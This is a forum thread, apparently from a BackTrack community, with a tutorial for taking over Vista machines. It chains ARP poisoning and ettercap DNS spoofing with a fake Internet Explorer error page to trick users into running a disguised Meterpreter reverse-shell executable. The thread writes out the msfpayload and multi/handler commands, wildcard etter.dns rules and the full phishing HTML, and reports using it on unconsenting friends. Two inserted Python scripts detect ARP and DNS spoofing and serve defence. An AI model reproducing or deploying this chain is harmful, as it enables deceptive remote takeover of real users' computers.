
Thread: vista reverse shell with ettercap phish--comments please

  1. #1
    Just burned his ISO | Join Date: Nov 2008 | Posts: 14

    vista reverse shell with ettercap phish--comments please

    Hello all. I am new to the posts and did not know where else to put this idea/tutorial, or at least how I have done my idea. Also, apparently I can only post here due to noob status; I have searched and did not see anything, so correct me if I am posting in the wrong place.
    (Back story) I was working with my programs last week, trying to break Vista, when it dawned on me that I could continue with my chosen path of fuzzing and debugging... and more than likely find a vuln. Or I could rely on something that's already vulnerable... the average computer user. Or, as H.D. Moore and Valsmith put it, "MEAT-WARE".

    Please note ALL tests were done at home on MY equipment and network, including: a Dell XPS running Backtrack 3 final as the native OS, an HP running Windows SP3, and a Sony Vaio running Vista Home Premium.
    Also a cheap Belkin router for network purposes.
    And of course, a few unsuspecting friends coming over for a visit to test the "hypothesis" on. lol.
    (Also forgive me for the 'Dr. Evil' feel to this.)

    Moving on, the original purpose of the idea, which is nothing new, is to create something that appears REAL to the end user. Phishing, but I'm not after credit cards or mass quantities of info; I want a shell on a SPECIFIC target.
    Backtrack comes with several services, the one of interest being an HTTP server. Knowing this I created 2 files, the first being index.htm and the other BrowserRestore.htm. I will not post the files, but I'm sure you can use your imagination. These pages, when viewed from the Windows browser, use java alerts to tell the user there has been a fatal error. I went with error 505. Also these pages bear a striking resemblance to IE error pages. The end user is then prompted, through page 2 and a fake "fake error scan", to run "Browser Restore", an app run through and by the browser. Does this really exist... NO. Do most users know this? NO.

    The next step is to create the executable. I chose msfpayload, using windows/meterpreter/reverse_tcp. My code looks like this. (Other payloads may be used; this is just an example, again, imagination.)

    #./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.*.* LPORT=4444 X > /var/www/htdocs/Browser-Restore.exe

    We now have an executable file for download and use in the home directory of our HTTP server. My second page contains a link to this file with an added java alert specifying "no need to reboot, pages may be unavailable for a few minutes, you may continue to use your computer, after a few minutes you may need to restart your browser". Again, the sky's the limit here.

    Now we have the payload set to connect to us, we need a way to use it.
    msfconsole's exploit/multi/handler comes in handy here. My code for this looks like:

    # ./msfconsole
    > use exploit/multi/handler
    > set PAYLOAD windows/meterpreter/reverse_tcp
    > set LHOST 192.168.*.*
    > set LPORT 4444
    > exploit


    I will more than likely automate this later with an .rc file, but for now it is set up to interact with our session when launched.
    OK, so we have our payload-launching .exe file, msfconsole is set to receive and interact, and our fake browser file. Now we need to get the user to this site. Ettercap is the tool I used for this job, with the plugin dns_spoof.
    You will need to alter your etter.dns file. Mine is located at

    /usr/local/share/ettercap/etter.dns

    I used nano to alter this file, adding links I knew would be used... google, facebook, myspace, etc. Again, target specific.
    #note: You may want to try (*.*.* A 192.168.*.*)
    These will be redirected to the HTTP server on my machine.
    Firing up ettercap, ARP poison your victim and use the plugin. This does not work on XP that well, or at all, confirmed on the ettercap forums. However, this does work on Vista, almost too well. When the #note above was tested, EVERY page loaded from the Vista machine was redirected to my 192.168.*.* HTTP server with the fatal error message and how to fix it.
    So we know it works.
    The next step would be to wait for your shell. Once acquired you need to STOP the dns_spoof, giving the target machine time to clear its cache and return to normal.
    My solution was to add an "onexit" java alert for the second web page, which states "Browser Restore is complete. Please restart your Internet browser if your pages are still unavailable after a few minutes. It also may be necessary to clear your temp. internet files. Etc., etc."
    The target, after a few minutes, gets their internet back, and you keep your shell.

    Moving on to a test. Would the average user follow the informative, realistic-looking links? YES. 4 friends and a week later, the answer is most definitely YES. The ATTACK computer was configured and left on standby in another room. One way or another my 4 buddies either needed to "check their mail" or what have you, and attempted to use my Sony, which failed to work, but succeeded for the attacking machine 4/4 times.
    1 person stopped and asked "uhhhh... did you do something, it's not working?" But was consoled with an answer of "No? How could I do anything, I'm in the living room? Did you break something?", knowing my hobby, and then proceeded to blindly click OK, then RUN. And this was the SMART college guy.
    Nevertheless my attacking comp. received a shell, every time.

    Thank you for your time; I would love to hear some feedback about this. If you have any questions about the files used, please feel free to ask. I did not post files, but if you are interested in seeing them, or have a question about one, let me know.
    Again,
    thanks
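The ARP poisoning step in the post above is the part of this chain that a defender can catch on the victim machine itself, before any DNS answer is spoofed. The Python script below is an added example, not code from this thread or from ettercap: it diffs two snapshots of Windows `arp -a` output and reports when the gateway's IP address has moved to a MAC address that another host on the LAN already owns. Both snapshots, the MAC addresses and the 192.168.1.x layout are constructed for the example.

```python
"""Spot ARP-cache poisoning (the step that lets dns_spoof see a victim's
queries) by diffing two "arp -a" snapshots taken on the victim.

Added example, not from the forum thread. Both snapshots below are
constructed in Windows "arp -a" format; every MAC address is invented.
"""
import re
from collections import defaultdict

# One "arp -a" data row: IPv4, hyphen-separated MAC, entry type.
ARP_ROW = re.compile(
    r"^\s*(?P<ip>\d{1,3}(?:\.\d{1,3}){3})\s+"
    r"(?P<mac>(?:[0-9a-f]{2}-){5}[0-9a-f]{2})\s+(?P<type>\w+)\s*$",
    re.I,
)

# Constructed: healthy cache, gateway and the other LAN host have distinct MACs.
BEFORE = """\
Interface: 192.168.1.7 --- 0x8
  Internet Address      Physical Address      Type
  192.168.1.1           00-11-22-33-44-55     dynamic
  192.168.1.4           aa-bb-cc-dd-ee-ff     dynamic
  192.168.1.255         ff-ff-ff-ff-ff-ff     static
"""

# Constructed: after poisoning, the gateway IP now carries the other host's MAC.
AFTER = """\
Interface: 192.168.1.7 --- 0x8
  Internet Address      Physical Address      Type
  192.168.1.1           aa-bb-cc-dd-ee-ff     dynamic
  192.168.1.4           aa-bb-cc-dd-ee-ff     dynamic
  192.168.1.255         ff-ff-ff-ff-ff-ff     static
"""


def parse_arp(text):
    """Return {ip: mac} from arp -a output; the broadcast entry is dropped."""
    table = {}
    for line in text.splitlines():
        m = ARP_ROW.match(line)
        if m and m["mac"].lower() != "ff-ff-ff-ff-ff-ff":
            table[m["ip"]] = m["mac"].lower()
    return table


def mac_changes(before, after):
    """IPs whose MAC differs between snapshots, as (ip, old_mac, new_mac)."""
    b, a = parse_arp(before), parse_arp(after)
    return sorted((ip, b[ip], a[ip]) for ip in b if ip in a and b[ip] != a[ip])


def duplicate_macs(text):
    """MACs bound to more than one IP: one host answering for another."""
    owners = defaultdict(list)
    for ip, mac in parse_arp(text).items():
        owners[mac].append(ip)
    return {mac: sorted(ips) for mac, ips in owners.items() if len(ips) > 1}


def is_gateway_poisoned(before, after, gateway="192.168.1.1"):
    """True when the gateway's MAC changed to one another host already uses."""
    b, a = parse_arp(before), parse_arp(after)
    if gateway not in b or gateway not in a or b[gateway] == a[gateway]:
        return False
    return a[gateway] in duplicate_macs(after)


if __name__ == "__main__":
    for ip, old, new in mac_changes(BEFORE, AFTER):
        print(f"{ip}: MAC changed {old} -> {new}")
    print("shared MACs:", duplicate_macs(AFTER))
    print("gateway poisoned:", is_gateway_poisoned(BEFORE, AFTER))
```

A MAC change for the gateway alone can be a legitimate router swap; the combination of a change plus the new MAC already owning another IP on the segment is what distinguishes poisoning. On a real host the snapshots would come from running `arp -a` on a schedule, and a static ARP entry for the gateway is the simple mitigation the thread's victims lacked.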

  2. #2
    Just burned his ISO | Join Date: Dec 2008 | Posts: 3

    Do you think you could post the pages you made and your "perfected" filter here on the forum?
    Thanks

  3. #3
    Just burned his ISO | Join Date: Nov 2008 | Posts: 14

    filter and pages

    Quote Originally Posted by dabom View Post
    Do you think you could post the pages you made and your "perfected" filter?
    here on the forum
    Thanks
    dabom,

    I found this topic in the "Backtrack3 final how to" section. Look for BigMac's posting on ettercap. You will find the filter I use, plus some changes made to the encoding of exe files. But there are still some `kinks` to be worked out of the process.

    As for my web pages. I have renovated them down to one page. I'm going with a revamped Internet Explorer (IE7) error page.
    1) People are more familiar with it
    2) it looks more legit.

    (**I hope that doesn't get me into too much trouble with anyone, for copyright or whatever other reasons, with the admins and whoever else is looking **)

    Plus I never could get the look JUST right without the style sheets. But anyway, I will post it in another reply.
    As for the filter and DNS_SPOOF: the spoof works on Vista, but it seems to have a problem with clearing the cache, so I dropped that part.
    And the filter I use is in the post listed above; I will also try to link it later.
    FILTER == works on Vista and XP, however not on ALL pages. It doesn't work on google and... if memory serves me right... facebook. Reason being, if you go to those pages and 'view source', it's ALL one line.
    So when the filter replaces text in a line... it seems to be replacing the ENTIRE line, and giving a 404 error. I'm still working on/looking for a solution to that, as are several people on the Ettercap forums. But thanks to the holidays I haven't been getting too much done with hobbies.
    I think that about sums up where the filter stands; there are more "quirks" with it all, but then again it depends on the target as well.

    Sorry for the long reply, but I felt that without giving somewhat of an explanation, you would more than likely be left with that "WTF" feeling when you started with it.

  4. #4
    Just burned his ISO | Join Date: Nov 2008 | Posts: 14

    the page

    Here is the page I am using now. If there are misspelled words or other errors, sorry, I have been working on it. But also keep in mind this is just mine; use that thing between your ears and get creative. Some seem to prefer the method of inserting into the browser. I like to redirect, simply because the user does not get a choice.

    **For those that know, skip through the next few steps. For those that do not know how to set this up, I'll give some directions.
    The links have been sterilized for obvious reasons.
    To use the page you will need a few things.

    These items are from the Internet Explorer error pages.
    *All files are case sensitive; if they are not named this way, they will not be called on by the html page

    1) a copy of errorPageStrings.js
    2) a copy of httpErrorPagesScript.js
    3) a copy of ErrorPageTemplate.css
    4) all png images from an IE error page:
    * info_48.png
    * bullet.png
    * down.png
    * up.png

    ~I used Google for the js and css pages. (Download them as a file; they do not come in text form... that I have found.)

    #Easy way to get png images...
    - In Backtrack, go to services and start your HTTPD service
    - From a Windows computer, go to your server "hxxp://192.168... etc."
    - Insert a random address, example: hxxp://192.168.1.4/hello
    - REPLACE the "X" with a "T" in "hxxp://"
    - If you did not know the previous step, STOP.
    - This should bring up the normal 404 error page.
    - Right click on all images. Select "Save Picture As". To save time later, save them as named above in bullets.
    - Copy these onto external media, or ssh or smb them to your Backtrack computer, and put them with the js and css files in your server's home directory.

    # For the page itself:
    - You will need to rename your OLD " index.html " file.
    - Create a new text file and name it whatever you want for now.
    - Copy my page info and paste to the new text file.
    - Read through and change the links to YOUR addy or to your exe file.
    * Or change whatever you want... It's your computer.
    * Also note your IP will change from network to network.
    - Then rename the file " index.html "
    - DONE

    ** Don't take offense to the directions; you never know, they may come in handy for someone **

  5. #5
    Just burned his ISO | Join Date: Nov 2008 | Posts: 14

    the page

    #PAGE
    <html>

    <head>
    <link rel="stylesheet" type="text/css" href="ErrorPageTemplate.css" >

    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <title>Web Browser Recovery</title>

    <script src="errorPageStrings.js" language="javascript" type="text/javascript">
    </script>
    <script src="httpErrorPagesScripts.js" language="javascript" type="text/javascript">
    </script>
    </head>
    <script language="javascript">
    <!--
    alert("The page you are viewing has encountered a Fatal Error.")
    //-->
    </script>


    <script language="javascript">
    <!--
    alert("Please see the Error page for more information on how to correct this problem.")
    //-->
    </script>

    <body onLoad="javascript:initMoreInfo('infoBlockID');">

    <table width="730" cellpadding="0" cellspacing="0" border="0">

    <!-- Error title -->
    <tr>
    <td id="infoIconAlign" width="60" align="left" valign="top" rowspan="2">
    <img src="info_48.png" id="infoIcon" alt="Info icon">
    </td>
    <td id="mainTitleAlign" valign="middle" align="left" width="*">
    <h1 id="mainTitle">The Web Browser Restore Utility</h1>
    </td>
    </tr>

    <tr>
    <!-- This row is for HTTP status code, as well as the divider-->
    <td id="errorCodeAlign" class="errorCodeAndDivider" align="right">&nbsp;
    <div class="divider"></div>
    </td>
    </tr>


    <!-- Scan Script -->
    <tr>
    <td>
    &nbsp;
    </td>
    <td id="MostLikelyAlign" valign="top" align="left">
    <h3 id="likelyCauses">Recovery Browser Scan:</h3>
    <ul>
    <li id="causeNotConnected"><script>

    /*Displaying a user's browser type script*/

    if (document.all)
    var version=/MSIE \d+.\d+/

    if (!document.all)
    document.write("You are using "+navigator.appName+" "+navigator.userAgent)
    else
    document.write("You are using "+navigator.appName+" "+navigator.appVersion.match(version))

    </script></li>
    <li id="causeSiteProblem">The Browser Font Encoder is not responding correctly.</li>
    <li id="causeErrorInAddress">The File responded with error code:</li>
    <ul id="errormessage" valign="top" align="left"><h5>HTML 505 -- Fatal Error</h5></ul>
    </ul>
    </td>
    </tr>

    <!-- Whats wrong -->
    <tr>
    <td>
    &nbsp;
    </td>
    <td id="whatToTryAlign" valign="top" align="left">
    <h2 id="whatToTry">Damaged File Corrective Action:</h2>
    </td>
    </tr>

    <!-- firewall boo hoo -->
    <tr>
    <td >
    &nbsp;
    </td>
    <td id="checkConnectionAlign" align="left" valign="middle">
    <h4>
    <table>

    <tr>
    <td valign="top">
    <img src="bullet.png" border="0" alt="" class="actionIcon">
    </td>
    <td valign="top">
    <ID id="installInfo">Note: Your Firewall may attempt to stop corrective action, due to unavailable port options. Please allow this program to connect to the Live Help Database.</ID>
    </td>
    </tr>
    <tr>
    <td valign="top">
    <img src="bullet.png" border="0" alt="" class="actionIcon">
    </td>
    <td valign="top">
    <ID id="installInfo">When Promted, Select 'RUN' and 'ALLOW', Browser Restore will attempt to re-install your plug-ins.</ID>
    </td>
    </tr>
    <tr>
    <td valign="top">
    <img src="bullet.png" border="0" alt="" class="actionIcon">
    </td>
    <td valign="top">
    <ID id="installInfo">Please allow a few minutes for the program to run. A system reboot is not required for this error..</ID>
    </td>
    </tr>
    <tr>
    <td valign="top">
    <img src="bullet.png" border="0" alt="" class="actionIcon">
    </td>
    <td valign="top">
    <a href="/\/\/\/\/\Insert EXE file's name here/\/\/\/\/\/\/\" onclick="return alert('Browser Restore needs to connect to the internet to download your plug-ins. Make sure you allow this program when prompted.');"><U>Click Here To Run Browser Restore.</U></ID></a>
    </td>
    </tr>
    </table>
    </h4>
    </td>
    </tr>

    <!-- InfoBlock -->
    <tr>
    <td id="infoBlockAlign" align="right" valign="top">
    &nbsp;
    </td>
    <td id="moreInformationAlign" align="left" valign="middle">
    <h4>
    <table>
    <tr>
    <td valign="top">
    <a href="#" onclick="javascript:expandCollapse('infoBlockID', true); return false;"><img src="down.png" id="infoBlockIDImage" border="0" class="actionIcon" alt="More information"></a>
    </td>
    <td valign="top">
    <span id="moreInfoContainer"></span>
    <noscript><ID id="moreInformation">Browser Restore Information</ID></noscript>
    </td>
    </tr>
    </table>
    </h4>

    <div id="infoBlockID" class="infoBlock" style="display: none">
    <p>
    <ID id="errorExpl1">Browser Recovery tool:</ID>
    <ul>
    <li id="errorExpl2">Browser Restore is provided to you, the user, for convenience of service.</li>
    <li id="errorExpl3">The executable will re-install damaged or unreliable software in the browser Directory(Dir.).</li>
    <li id="errorExpl4">The End-User License Agreement can be referenced Via the browser Dir.</li>
    <li id="errorExpl5">The License Agreement will take on no changes from updates made with Browser Restore.</li>
    <li id="errorExpl6">Some ActiveX controlls may be needed in order to complete download and installation, If these tools are blocked by the Browser, it is recommended that you unblock them via the Icon bar at TOP of page.</li>
    </ul>
    </p>


    </div>
    </td>
    </tr>

    </table>

    </body>
    </html>
    Alright, hope that about covers it. Enjoy and let me know what you think. Again, it's a work in progress, so give some feedback.

  6. #6
    Just burned his ISO | Join Date: Dec 2008 | Posts: 3

    Thanks, looks great. I've made a couple minor changes to it (spelling, capitalization) but nothing worth posting.

    I'm not sure why dns_spoof wasn't working for you in XP but it works fine for me:
    * A 192.168.X.X
    *.* A 192.168.X.X
    *.*.* A 192.168.X.X
    *.*.*.* A 192.168.X.X

    I recompiled thttpd so that it wouldn't show its version at the bottom when you get a 404 (which is redirected to the "error" page) and it's working perfectly.

    Your ettercap filter didn't work for me.

    P.S. Those files (.js and .css) were a pain to find.
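The etter.dns wildcard in the first post and dabom's four-line rule set above both produce the same thing on the wire: every name the victim looks up is answered with one LAN address. The Python script below is an added example, not from this thread or from ettercap; it reads a DNS-response log (the log format and the sample lines are constructed for the example) and flags any RFC 1918 address that is returned as the A record for several unrelated domains, which is the signature such a spoof leaves in resolver or IDS logs.

```python
"""Detect the wildcard DNS-spoof pattern from DNS response logs.

Added example, not from the forum thread: flags a private (RFC 1918) address
handed out as the A record for many unrelated domains, the effect of rules
such as "*.*.* A 192.168.x.x". The log format and sample lines are invented.
"""
import ipaddress
import re
from collections import defaultdict

# Constructed log line shape: "<date> <time> client=<ip> q=<name> a=<ip>"
LOG_RE = re.compile(
    r"^(?P<ts>\S+ \S+) client=(?P<client>\S+) q=(?P<qname>\S+) a=(?P<answer>\S+)$"
)

# Constructed sample: one client's lookups all point at a single LAN host,
# while a second client gets normal public answers plus a real LAN printer.
SAMPLE_LOG = """\
2008-12-01 10:00:01 client=192.168.1.7 q=www.google.com a=192.168.1.4
2008-12-01 10:00:03 client=192.168.1.7 q=www.facebook.com a=192.168.1.4
2008-12-01 10:00:05 client=192.168.1.7 q=www.myspace.com a=192.168.1.4
2008-12-01 10:00:06 client=192.168.1.7 q=mail.example.org a=192.168.1.4
2008-12-01 10:00:09 client=192.168.1.9 q=www.google.com a=74.125.45.100
2008-12-01 10:00:10 client=192.168.1.9 q=printer.lan a=192.168.1.20
this line is garbage and must be skipped
"""


def registrable_domain(qname):
    """Crude registrable-domain extraction (last two labels); enough here."""
    labels = qname.rstrip(".").lower().split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else qname.lower()


def parse_log(text):
    """Yield (client, qname, answer_ip); malformed lines are skipped."""
    for line in text.splitlines():
        m = LOG_RE.match(line.strip())
        if not m:
            continue
        try:
            answer = ipaddress.ip_address(m["answer"])
        except ValueError:
            continue
        yield m["client"], m["qname"], answer


def find_wildcard_spoof(text, min_domains=3):
    """Return {private_ip: sorted domains} for answers shared by many domains.

    A legitimate LAN host (printer.lan -> 192.168.1.20) is the answer for
    one domain only and stays under the threshold; the spoofing host
    collects every unrelated domain the victim asked for.
    """
    by_answer = defaultdict(set)
    for _client, qname, answer in parse_log(text):
        if answer.is_private:
            by_answer[str(answer)].add(registrable_domain(qname))
    return {ip: sorted(d) for ip, d in by_answer.items() if len(d) >= min_domains}


def victims_of(text, spoof_ip):
    """Clients that received spoof_ip as an answer, to scope the incident."""
    return sorted({c for c, _q, a in parse_log(text) if str(a) == spoof_ip})


if __name__ == "__main__":
    for ip, domains in find_wildcard_spoof(SAMPLE_LOG).items():
        print(f"{ip} answers for {len(domains)} unrelated domains: {domains}")
        print("  affected clients:", victims_of(SAMPLE_LOG, ip))
```

The threshold is deliberately low because the spoof answers everything; in a real deployment the same grouping would be run against the resolver's logs per client, and the list returned by `victims_of` is the set of hosts whose caches need flushing once the rogue host is found.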

  7. #7
    Just burned his ISO | Join Date: Nov 2008 | Posts: 14

    Quote Originally Posted by dabom View Post
    Thanks, looks great. I've made a couple minor changes to it (spelling, capitalization) but nothing worth posting.

    I'm not sure why dns_spoof wasn't working for you in XP but it works fine for me:
    * A 192.168.X.X
    *.* A 192.168.X.X
    *.*.* A 192.168.X.X
    *.*.*.* A 192.168.X.X

    I recompiled thttpd so that it wouldn't show its version at the bottom when you get a 404 (which is redirected to the "error" page) and it's working perfectly.

    Your ettercap filter didn't work for me.

    P.S. Those files (.js and .css) were a pain to find.
    Thanks, I hope you find a good use for all this. I'm still re-doing the page from the original version; I need to change the "more info" and clean it all up a good bit.
    Which version (SP?) of XP are you using dns_spoof against?
    ...Also, are you running WEP or WPA encryption on your network?
    Vista seems to be more "cautious" when run on an "open" network. It also may be noteworthy that out of all the versions of Vista, the home packages don't seem to give me the IDS firewall "ALLOW?" box. However, the premium and professional packages do. Maybe that's why they cost more, lol.
    Yes, those files were a pain to find. I think I got mine from a net directory in a really weird place, on about the 9th page of a Google search.

  8. #8
    Just burned his ISO | Join Date: Dec 2008 | Posts: 3

    XP SP3 and on an open network with MAC filtering, although the MAC filtering is not really relevant.
    Please post the new version once you are done.

  9. #9
    Member | Join Date: Mar 2010 | Posts: 123

    Just stumbled in on this and I really like the concept.

    I will have a play with this when I get a bit of spare time. But hey, what a novel idea of a shell: just ask the end user to click you in nicely. Sounds like a kind of messed up social engineering technique.

    Nice 1

  10. #10
    Just burned his ISO | Join Date: Feb 2008 | Posts: 3

    Very nice Tuto.

    I tried it against a vista machine and it worked perfectly with everything on.

    I have to improve my web page to look better, but I like the concept too.

    Good job
